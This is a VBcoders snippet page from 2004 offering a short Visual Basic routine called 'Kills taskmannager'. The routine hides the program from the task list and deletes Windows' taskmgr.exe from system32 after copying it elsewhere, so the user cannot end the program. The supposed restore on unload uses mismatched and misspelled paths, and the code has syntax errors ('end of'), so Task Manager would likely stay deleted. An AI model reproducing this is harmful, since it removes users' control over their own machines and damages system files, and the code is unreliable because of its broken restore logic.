VBcoders Guest



Don't have an account yet? Register
 


Forgot Password?



Kills taskmannager

by chinky magic (1 Submission)
Category: Encryption
Compatability: Visual Basic 5.0
Difficulty: Unknown Difficulty
Originally Published: Thu 12th February 2004
Date Added: Mon 8th February 2021
Rating: (1 Votes)

Kills taskmannager

Rate Kills taskmannager




killtaskmngr true
app.taskvisible = false

end sub

public sub killtaskmngr(do_it as boolean)

if do_it = true then
 filecopy "c:\windows\system32\taskmgr.exe", "c:taskmrg.exe"
 kill "c:\windows\system32\taskmgr.exe"
else
 filecopy "c:\taskmgr.exe", "c:\windows\system32\taskmrg.exe"
end of

end sub

public sub form1_unload(cancel as integer)

killtaskmngr false

end sub


Download this snippet    Add to My Saved Code

Kills taskmannager Comments

No comments have been posted about Kills taskmannager. Why not be the first to post a comment about Kills taskmannager.

Post your comment

Subject:
Message:
0/1000 characters